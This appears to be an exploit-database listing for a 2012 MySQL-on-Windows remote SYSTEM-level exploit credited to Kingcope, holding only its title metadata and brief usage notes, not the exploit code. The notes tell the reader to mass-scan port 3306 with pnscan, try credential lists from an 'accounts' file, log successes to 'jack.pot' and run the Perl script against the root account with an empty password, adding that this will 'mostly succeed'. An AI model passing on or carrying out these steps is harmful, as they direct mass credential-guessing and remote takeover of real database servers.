[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
# Published : 2012-12-02
# Author :
# Previous Title : Samba SetInformationPolicy AuditEventsInfo Heap Overflow
# Next Title : Novell NetIQ Privileged User Manager 2.3.1 auth.dll pa_modify_accounts() RCE

MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit
Version 1.0
By Kingcope
In the Year of 2012


use this on a fast scan server!

How to use.

the file "accounts" holds the user/password combinations to try.
hits are saved in the file "jack.pot".

#make lnx
#./pnscan 3306

#perl mysql_win_remote.pl root "" 5555

user root on windows will mostly succeed.